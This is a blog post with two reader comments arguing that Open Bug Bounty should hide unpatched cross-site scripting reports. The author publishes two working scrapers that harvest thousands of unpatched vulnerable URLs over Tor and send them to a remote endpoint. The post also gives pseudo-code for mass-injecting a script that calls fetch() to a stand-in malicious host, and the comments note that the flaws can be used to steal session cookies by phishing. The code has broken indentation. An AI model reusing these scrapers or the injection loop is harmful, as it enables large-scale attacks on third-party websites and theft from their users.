Why Open Bug Bounty Should Restrict Their Site

While administering a website for a local news station, it was brought to my attention that the CMS we were using was vulnerable to cross-site scripting. The company “Open-Bug-Bounty” emailed our contact point, and disclosed this bug responsibly. At first, we didn’t know whether to take the email seriously, but eventaully, after showing the email to the owners of our content management system, we discovered that the bug was serious and was patched. This incident brought to my personal attention that the site “Open Bug Bounty” was offering a service to those in the web development community that allowed site owners to secure their sites against XSS attacks.

After some poking around the site, I discovered the site also displayed vulnerable sites that were unpatched, leaving me to imedieatly log the information in my own database. So, utilizing the open-source software of cloud-flare scraper, I was able to log all of the site’s un-patched vulnerabilities. So far, my database contains over 4,000 vulnerabilities ready to be implemented in some sort of botnet. And I consider myself on the low-end of pentesters, so someone with a real grasp on netsec could really do damage with this information.

The site, which currently resides here shows over one-thousand vulnerable websites. This is a haven for hackers and script-kiddies alike, allowing those with the knowledge to potentially cause damage on a world-wide scale. This information is open source, and publibly accessible. All I did was create a scraper that put all of the information in a database. I personally did not utilize this information, but one could easily put up a python bot to test each of these vulns, allowing them to upload their own scripts to the site that have the potential to range from simple redirects up to keyloggers installed on the front of the site.

For example, one of the sites that open-bug-bounty logged was a url that allowed some JavaScript to be executed once a svg graphic was loaded. Other major sites made there way onto the site as well, allowing for users to peruse at their own will.

Open-Bug-Bounty should really make this information closed-source. Despite the fact they ‘responsibly disclose’ the information to site owners, they still allow unpatched vulnerabilities to surface onto the clear-net once a certain amount of time has passed. Certainly, this is equivelent to holding a site hostage, co-ercing a site into behaving in some sort of fashion, or else.

I will post the two scrapers I made below, showing that I did nothing outrageous in order to amass this information. If Open-Bug-Bounty see’s this, I recommend at least hiding all vulnerabilities until patched, instead of giving the site owners an ultimatum… Patch or it will be released!

SCRIPT 1: This script visited each page of ‘open-bug-bounty’ after connecting through TOR, allowing the scraper to log all of the relevant information into one of my own databases.

import os
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from bs4 import BeautifulSoup
import requests

def headless():
    profile = webdriver.FirefoxProfile()
    profile.set_preference("network.proxy.type", 1)
    profile.set_preference("network.proxy.socks", '127.0.0.1')
    profile.set_preference("network.proxy.socks_port", 9050)
    profile.set_preference("network.proxy.socks_remote_dns", True)
    profile.update_preferences()
    options = Options()
    options.headless = True
    headless_driver = webdriver.Firefox(firefox_profile=profile, options=options)
    return headless_driver

def standard():
    profile = webdriver.FirefoxProfile()
    profile.set_preference("network.proxy.type", 1)
    profile.set_preference("network.proxy.socks", '127.0.0.1')
    profile.set_preference("network.proxy.socks_port", 9050)
    profile.set_preference("network.proxy.socks_remote_dns", True)
    profile.update_preferences()
    normal_driver = webdriver.Firefox(firefox_profile=profile)
    return normal_driver

lower_bound = 1150
upper_bound = 7789

for page in range(lower_bound, upper_bound):

driver = headless()
print "https://openbugbounty.org/latest/page" + str(page) + "/"
driver.get("https://openbugbounty.org/latest/page/" + str(page) + "/")

page_soup = BeautifulSoup(driver.page_source, 'html.parser')

table_wrapper = page_soup.find('div', {'class': 'content'})

table_div = table_wrapper.findAll('tr')

for td in table_div:

    table_data = td.findAll('td')

    if table_data[3].text.strip() == 'unpatched':

    link = table_data[0].find('a').get('href')

    cat_link = "https://www.openbugbounty.org" + link

    domain = table_data[0].text.strip()

    data = {'link': cat_link, 'domain': domain, 'picklerick': 'picklerick'}

    url = "http://198.58.114.199/endpoint_unpatched.php"

    r = requests.post(url, data)

    if r.status_code != 200:
          print "Could not log data: " + str(data)

    driver.close()

SCRIPT 2: Once all the relevant URLs were logged in a database, the next scraper visited each of the pages and logged the vulnerability with the help of cfscrape.

 1 import requests
 2 import cfscrape
 3 from bs4 import BeautifulSoup
 4 import MySQLdb as my
 5 
 6 def get_results(page):
 7     scraper = cfscrape.create_scraper()
 8     page_content = scraper.get(page).content
 9     soup = BeautifulSoup(page_content, 'html.parser')
10     table = soup.find('table', {'class':'url-block'})
11     text_area = table.find('textarea')
12     return text_area.contents[0]
13 
14 db = my.connect('localhost', 'python', 'mufasa.gq', 'open_bug_reports')
15 
16 cursor = db.cursor()
17 
18 exploit_set = cursor.execute("SELECT id, link, domain FROM unpatched WHERE id > 881")
19 
20 result = cursor.fetchall()
21 
22 db.close()
23 
24 for row in result:
25     db = my.connect('localhost', 'python', 'mufasa.gq', 'open_bug_reports')
26     cursor = db.cursor()
27     id = row[0]
28     domain = row[2]
29     vuln = get_results(row[1])
30     try:
31         sql = '''INSERT INTO vuln_strings ( rel_id, vuln, domain ) VALUES ({}, "{}", "{}")'''.format(id, db.escape_string(vuln), domain)
32         print sql
33         result = cursor.execute(sql)
34         db.commit()
35         db.close()
36     except:
37         print "Could not encode vulnerable string for domain: " + domain
38         db.close()
39 
40 
41 

I will layout some psuedo-code as to how one could take each of the URL’s logged in the database, and upload malicious scripts.

sql = "select vuln_url from vulns_table"
result = query(conn, sql)

for url in result:
    try:
        success = requests.get(url + "?onload=fetch(/https://malicousurl/")
        if success:
            sql = 'insert into success table (vuln, script) VALUES (vuln, script)'
            result = query(conn, sql)
     except:
           pass

 

You Might Also Like

2 Replies to “Why Open Bug Bounty Should Restrict Their Site”

  1. It sounds as though you got burned on this and are now blaming the site, when really the vulnerability wasn’t remediated fast enough. You admitted yourself you didn’t take the vulnerability initially seriously, which, unsurprisingly, proved fatal.

    Additionally:

    “So far, my database contains over 4,000 vulnerabilities ready to be implemented in some sort of botnet.”

    Reflective XSS isn’t plausible as a means of a botnet.

    “And I consider myself on the low-end of pentesters, so someone with a real grasp on netsec could really do damage with this information.”

    Most medium/high end pentesters could already identify this kind of stuff on the fly with something like shodan. It’s never been that hard to make a botnet, people just choose not to out of ethics.

  2. about the reflective, yes after i wrote this i realized reflective XSS attacks cant be utilized to access the server. But they can be used to garner session cookies by sending phishing attacks with the loaded link. that puts the users at risk, which is more dangerous than a server being at risk.

Leave a Reply

Your email address will not be published. Required fields are marked *